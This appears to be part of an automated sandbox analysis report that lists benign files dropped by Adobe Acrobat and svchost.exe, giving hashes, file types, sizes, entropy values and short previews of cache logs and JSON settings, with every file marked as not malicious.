                                                        SSDEEP:6:6xpoaaD0JOCEfMuaaD0JOCEfMKQmDaxpoaaD0JOCEfMuaaD0JOCEfMKQmD:7aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                        MD5:54D24A9E5B26A574BA88CC61575C44B3
                                                        SHA1:A7BBFB0021907F5A1C0495798440344743155DA8
                                                        SHA-256:502373EC6695657DE5CE332F59FD5E091570CFA5807C961F7EDD11805277F5D6
                                                        SHA-512:16B23BF128E761E1B68F0C62D678E0FEAB634F3ADB2BA3DB7B22DA7753A90C059E13F744F1787A602AC443A72402BED9BA657CF4000EEF351649C9A5F02BF986
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.8847854707019341
                                                        Encrypted:false
                                                        SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9Y:0J7adfWuK0p/QDfKoPeuP0aN4fqoxE
                                                        MD5:50612812C14CC9772575EF6A39204422
                                                        SHA1:056605CB1446848C2ED664557311F6C4E002471E
                                                        SHA-256:EB5435C8D0B1AA3EBD4E1CBF48A779EE1E1A86BE8822D8B4AA35FEC74AFAF449
                                                        SHA-512:24D611403E8E35BFA1D8953B579B1DAC0F77D248B9A96677475D1E42955BB087215AA26C494CA803E277890A35E98315F612BD9BCED9587D8CD61A99EEFEBC88
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74f2fb4f, page size 16384, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.6554782758957708
                                                        Encrypted:false
                                                        SSDEEP:1536:5SB2ESB2SSjlK/2VT9Dr1k0aXjJ8VQCYkr3g1652UPkLk+kAv/gKr51KrSSfSDZ5:5azaAVVL4y2UC
                                                        MD5:4411FD71A9658DB12AD8B0FD4471008C
                                                        SHA1:6D879B351987C34F9CA8D80103D08EF66468FB48
                                                        SHA-256:5E7BA177465FD47CD73A4D214F3D8E9736621D0CC6804F44F058262BB2999D43
                                                        SHA-512:1855019E5BCF29668164F86315F9225FFE924B217229B8D5C9C3F0EF4A360DA78945D2162A8C0012A457294F33175635DF3A10456EC2FB354D3665795094517B
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.08114118028755855
                                                        Encrypted:false
                                                        SSDEEP:6:UCWlzhoJbZIl/J6XdTZOl/0nIl/AWiCpPQ:UCUlCW/kX9ZOWY/DiC
                                                        MD5:E75FDF3A36D320AFBBD12B9B564165BA
                                                        SHA1:2CC83EE1852EC72763E94D270639170935A62263
                                                        SHA-256:E84BBC9F7394B52CA2CB2B2F01A990BE9DDC1091DA0867A8C71C53E8DEC19BFC
                                                        SHA-512:1A09EC24517F467635F029C765EB563A8B4675F13612FD1AB7A6CC11DF9EBB70A7402948BCDAFC57DB42280E0187385C2F8501006623EED52458F031C24340D6
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.267429110821645
                                                        Encrypted:false
                                                        SSDEEP:6:crATt+q2PFi2nKuAl9OmbnIFUt8Pu8Zmw+Pu8VkwOFi2nKuAl9OmbjLJ:8nvdZHAahFUt8G8/+G85wZHAaSJ
                                                        MD5:3B3CCC8C1E85C28010A699F544AC16D7
                                                        SHA1:9D18CAA6027BAFFBAC4D52D952231BA150E816C6
                                                        SHA-256:A64C974D9BA71E69F6245D920176A59838CA90EB1CA8D623FEA5E82840F80DB9
                                                        SHA-512:50D5F4DE883E16E81AF4A0A4CEE424CCA9C879244188FFF4DAECE5157EDAD8AFB708049C5D2325BC95533C56066D0AEE87BD55A1B4DF45DB83972C84131D6E2B
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.682 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-02:47:49.685 e68 Recovering log #3.2024/12/27-02:47:49.685 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):331
                                                        Entropy (8bit):5.195753339620762
                                                        Encrypted:false
                                                        SSDEEP:6:c5aQ+q2PFi2nKuAl9Ombzo2jMGIFUt8PfSgZmw+P+SQVkwOFi2nKuAl9Ombzo2jz:dvdZHAa8uFUt8X/+a5wZHAa8RJ
                                                        MD5:33E9D0F2184C5E141AC39058A2CB4FFB
                                                        SHA1:AA2C4C97F03FC7B9BEC78F4F6E7A23B0AF4E7200
                                                        SHA-256:97ED3D21B7D5B85269865C90241910549444D833222A717BFC11F05FDF0FF9A6
                                                        SHA-512:6AA90C42B9E6653C7B10A5A1E9D32A5890024181E75707BB960B087ED2AA7059B37CDC0F9C1B452AF6DB5C9482E6F76451D1AE7C69A6C580B13AB67394168540
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.709 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:47:49.710 b88 Recovering log #3.2024/12/27-02:47:49.711 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:modified
                                                        Size (bytes):476
                                                        Entropy (8bit):4.979922099301615
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqY7AxsBdOg2HRHAcaq3QYiubpP7E4TX:Y2sRdsJAidMH1r3QYhbd7n7
                                                        MD5:E0483C9CF24B0AC5A3468516B363A1FC
                                                        SHA1:CA3E5AE9E20085617556909F7BCF02D41022DEC4
                                                        SHA-256:DD9990E0527950877407D7854DDB64A67C097628D2162C2B855200603186F754
                                                        SHA-512:6B51AC99B4DCBECED70719B30D6431EB280FC495F107356D44F2F7CF00246E0E3B17C372BBF8093DC55EE133CD92E98D076CAD87B84D8BB3387346F0B2333311
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379845678091680","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":653871},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):476
                                                        Entropy (8bit):4.962905575204746
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                        MD5:F371FDA655516B50D489FC8CFB1306C9
                                                        SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                        SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                        SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3878
                                                        Entropy (8bit):5.237430032488173
                                                        Encrypted:false
                                                        SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVzJpnNhb5qv:wshFT0h7cZb2EVKZPEANcGIK5EVzbN+v
                                                        MD5:138400FB1E3C581B4F59848371755055
                                                        SHA1:F1791A7B3376017F69414697AF7F39DD8AF97E6D
                                                        SHA-256:83ACB8D502051802296AD368DAB2410C92F83F0826221EB17DAC2303E9C4EFE3
                                                        SHA-512:313CF0304B793D0C9447ABC0A8C2DBF1CABA7745D5E41EE40A540B46F34CEAC965062D8CCA4ABEB16ABD426497CECE1C0BD778DA1F5051B7BA7A03359970F0AF
                                                        Malicious:false
                                                        Preview:*...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):319
                                                        Entropy (8bit):5.1986628119905705
                                                        Encrypted:false
                                                        SSDEEP:6:c7Q+q2PFi2nKuAl9OmbzNMxIFUt8P0QgZmw+PCQVkwOFi2nKuAl9OmbzNMFLJ:QvdZHAa8jFUt8M5/+d5wZHAa84J
                                                        MD5:920FA9A9AD788E3BBF866C31469C58D3
                                                        SHA1:BBBEF8107E5D55364444A8D7448B2AEA63D86411
                                                        SHA-256:5CCE4A7F5CD5A43107ED526F59AD04F35EB3B6D6A887D71A99AB320F867D6E3C
                                                        SHA-512:8B5FA4CBC03A890F88CE4EB8247DD64ECD674A75474E43AD0D0E10F00994178F327081DD0C4E999F824CE779221A50D1A8560611C72BE0D38C29FB94CD64C5F4
                                                        Malicious:false
                                                        Preview:2024/12/27-02:47:49.807 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-02:47:49.821 b88 Recovering log #3.2024/12/27-02:47:49.822 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                        Category:dropped
                                                        Size (bytes):65110
                                                        Entropy (8bit):2.149800531192087
                                                        Encrypted:false
                                                        SSDEEP:192:arW/0KCorycSBECzu9HLdFQqCoVsjfj5KfXKgyQQ0VTFRH0a:ar0vogCzu9HpFQq7S0NyQQ0ZH0a
                                                        MD5:8E76B48B815EF88812C96CC62A3D7390
                                                        SHA1:CF45768B64E9D83D7892D02ECFA90B17C03AD626
                                                        SHA-256:0ECA97B3D5B789FEA64A38D8966BBA31C8C8C43487F352D2C02AB9F61F9EB54B
                                                        SHA-512:84F114F38F8F5F90DC86BADDAD9FAE1724EADF6A05C2B3CCD65D2918C068FC56A138D333348B55D7A69F935999758475B9D41A4DA860A1DAAAA4CA37534E9A40
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                        Category:dropped
                                                        Size (bytes):86016
                                                        Entropy (8bit):4.438754316787656
                                                        Encrypted:false
                                                        SSDEEP:384:yejci5GMiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0gurVgazUpUTTGt
                                                        MD5:58F943B86EF48DA66B3A230EE7591A0C
                                                        SHA1:743F387F4E51F7F2FBC63E78B101A144144611E0
                                                        SHA-256:411B90598DB39B6CD88D0F575A709FAB1013C1A49D6E3F2D7A0887110ADBF58E
                                                        SHA-512:0EEDE7C2F58E46B1CD03C7CBFF45210257C1E52567D37F140C667306D2F4673F25CD132D9DD140B808876FB33D896493702A6B68CB703258F9BF41A3E5CEBFF6
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):3.7747576877099185
                                                        Encrypted:false
                                                        SSDEEP:48:7MEp/E2ioyVAioy5oWoy1CUoy1YKOioy1noy1AYoy1Wioy1hioybioy+oy1noy1c:7PpjuAJjXKQLwb9IVXEBodRBkh
                                                        MD5:7F631BBD3489538A37C28548ADD42B54
                                                        SHA1:39997426D258BF96A60512F0E59671A95C40F2C3
                                                        SHA-256:556E537D971159787A9AABD8CB0E1F8528E1D2ED0D8C97A11FFBD8BD64C51123
                                                        SHA-512:0FC0439542CA889EC7039025563DF7995B4DFFAF846737EC45E000802D852938283D1BEC75F0B6B38C104AC28986770C24982833B24A3107E7CCCFAD14A5D6D7
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Certificate, Version=3
                                                        Category:dropped
                                                        Size (bytes):1391
                                                        Entropy (8bit):7.705940075877404
                                                        Encrypted:false
                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):192
                                                        Entropy (8bit):2.7673182398396405
                                                        Encrypted:false
                                                        SSDEEP:3:kkFkl2/2kltfllXlE/HT8kx6/h/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKv/2kleT84KRNMa8RdWBwRd
                                                        MD5:D0A05D2AC49FAF5735532C14EABE6F74
                                                        SHA1:87B0E2D3853E382AE340F66EFD8210C1AFF9AB72
                                                        SHA-256:657FD2682C18F24DF01C84ABEDF61F519E19BCBBED3FD2E88A3606C6ED9B5E43
                                                        SHA-512:281A75392FA19CB98C038BDD594E08DA6877F9B60960499CB15BECBDCD9EFAAF6BCAA670FDB1EA405A9194CBD07ADE86C0C1641697275D7E8C9BCD5B168E661D
                                                        Malicious:false
                                                        Preview:p...... ...........3X..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):328
                                                        Entropy (8bit):3.241800306278291
                                                        Encrypted:false
                                                        SSDEEP:6:kKVFlL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HkDImsLNkPlE99SNxAhUe/3
                                                        MD5:254D9A23FB7E90EE36AC61A6355D116F
                                                        SHA1:43D11C91CBA980CA2437C8B33271B230AD9BA05A
                                                        SHA-256:E4952E8761BAA20D5601E3E7E38FA4C7BF3D29F3651FC6D9FE6E31A36DC36544
                                                        SHA-512:07CED673F00BED142B9E3A5F42EE0224EFEAEDE4FC394F930AB05A0D1FA994FBFDC56B22A32EC1680C76AE1B186DF92F0906F5C805E59412CE7A4E0A573C082D
                                                        Malicious:false
                                                        Preview:p...... ...........3X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):10880
                                                        Entropy (8bit):5.214360287289079
                                                        Encrypted:false
                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):295
                                                        Entropy (8bit):5.347362202975625
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJM3g98kUwPeUkwRe9:YvXKXx+TQmyU1UTbdiGMbLUkee9
                                                        MD5:4238E8A42DA5B0ADC1D7B37037398745
                                                        SHA1:0A8470B04B15AB68F44B8551EED3D2985851B65C
                                                        SHA-256:D0732EBA5B2B8AFD97ABF895E523786F15DECE77C2C2882EB9F48FB636E5377C
                                                        SHA-512:279B83914AA36FC5AB5750B03C2F8ACFC0CF030A921E5D9710A70D7E5E6D4147FF3CB91F1FD926194AB45868AEDE8DD9CE40B003A565A8FBCC794B79690478F4
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.288037307614041
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfBoTfXpnrPeUkwRe9:YvXKXx+TQmyU1UTbdiGWTfXcUkee9
                                                        MD5:DBBA38A1039588C49BA0C0B7C71CB0BB
                                                        SHA1:569E64A115785FF83218DD0B6A1EE7BFC55B753F
                                                        SHA-256:8E48D375D9CC2967050049106BA070800E4ABDC9E793A12263BC816ED6241662
                                                        SHA-512:4F72FEEF7EC22142C006261A0F0C87AC547E5B0D109BCD6B74E1A4F546BAA977200377CC939F752388378E55999DF4394D00D468A4A721DAFDF1C76367898754
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.265989907613401
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfBD2G6UpnrPeUkwRe9:YvXKXx+TQmyU1UTbdiGR22cUkee9
                                                        MD5:EDD9C5821D74E6C32B34F131A0E988BE
                                                        SHA1:23C986CFBEE869D040E76D87FD9974D766D3D605
                                                        SHA-256:383D4C577AC8E20A973CF890B131019A351DBEA89FA266E507FE35F512FF79C0
                                                        SHA-512:861C5ADC9E53CD152F6166B77F35C816919514E0F6838ADECE17F6EA69FB52DE8F2E3E90473A0BC942D9FC8B7D48C6097F02E37A652125CC86049EB7B2E50F13
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):285
                                                        Entropy (8bit):5.321079467835037
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfPmwrPeUkwRe9:YvXKXx+TQmyU1UTbdiGH56Ukee9
                                                        MD5:2AC0F90ADFD1638DB4F47210313D191F
                                                        SHA1:003894A7F411D8099D8E73860ADCF4A213820739
                                                        SHA-256:2C535987232A8FD3B7959FA15632FC12B3135AB7C800C47CB47CF1C1E406EA7E
                                                        SHA-512:F180CD30CC9B7620CA438B73771156F7BB645C647BA7DDDECBBDC54B827C6F33DE1111EA0202D004EABBBD8621033DB81E1E2BB5B94F639B5D673A9A94A7197C
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1123
                                                        Entropy (8bit):5.682129451531302
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xx+TQmyCUXZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:Yv0W7VwZhgy6SAFv5Ah8cv/O
                                                        MD5:79E92C71E4CA3744405A3CAC45F2A3C0
                                                        SHA1:55334D857BB845AAA51CF78F83AAF4DD025EF98D
                                                        SHA-256:A909B8BC66A8480557DF0A3BF6FD0BB2B16A22203B95948E34C64C5805851123
                                                        SHA-512:0A927E7E898CAEA75E8CDBB270AF9BBD38423562E52247E28B3CFFF7129ADE4FE70258BFD1383BCDCF01D38C8786F066D4E6EA31C9953A64C37F519201006F0C
                                                        Malicious:false
